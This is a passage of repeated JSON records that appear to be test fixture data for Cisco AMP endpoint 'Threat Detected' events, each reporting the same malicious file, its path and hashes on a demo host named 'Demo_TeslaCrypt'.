Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163587","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163586","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":395000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163585","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163578","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163577","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163576","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163575","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163574","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163572","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163571","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163570","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163568","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":83000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163566","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
